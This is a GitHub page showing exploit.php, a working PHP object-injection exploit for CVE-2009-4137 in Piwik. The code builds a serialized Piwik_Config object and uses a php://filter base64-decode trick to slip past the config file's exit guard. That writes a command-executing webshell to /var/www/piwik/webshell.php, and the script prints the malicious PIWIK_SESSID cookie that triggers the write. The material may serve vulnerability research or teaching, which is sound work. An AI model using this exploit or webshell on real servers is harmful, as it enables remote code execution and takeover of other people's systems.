-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathexploit.php
44 lines (34 loc) · 1.79 KB
/
exploit.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
/*
We exploit the CVE-2009-4137 by using a php object injection of a Piwik_Config object
The __destruct() function of this object writes the config to the path specified in the pathIniFileUserConfig variable
The content of a config file is always prepended by a php showstopper as seen in the following two code-lines of Config.php
$configFile = "; <?php exit; ?> DO NOT REMOVE THIS LINE\n";
$configFile .= "; file automatically generated or modified by Piwik; you can manually override the default values in global.ini.php by redefining them in this file.\n";
To circumvent this, we use php://filter/write=convert.base64-decode and pre-encode our payload. PHP is nice enough to just skip every character that is not part of the base64 alphabet
We then prepend a single character to correct the padding to our payload and write a simple php webshell.
A request to the piwik server with the cookie then triggers the exploit
(You need to url_encode the Cookie if you use manual requests. The '+' and '/' characters of the base64 alphabet must be encoded)
*/
class Zend_Config {
protected $_data = array(
"login" => "root",
"password" => "rootroot",
"email" => "[email protected]"
);
}
class Piwik_Config {
protected $configFileUpdated = true;
protected $doWriteFileWhenUpdated = true;
protected $correctCwd = ".";
protected $pathIniFileUserConfig = "php://filter/write=convert.base64-decode/resource=/var/www/piwik/webshell.php";
protected $userConfig = array();
function __construct() { // 'a' for padding
$this->userConfig["a".base64_encode('<?php system($_GET[\'cmd\']); ?>'."\n")] = new Zend_Config;
}
}
$b64 = base64_encode(serialize(new Piwik_Config));
$urlEncoded = urlencode($b64);
echo "Use this cookie";
echo "PIWIK_SESSID=".$urlEncoded."\n";
?>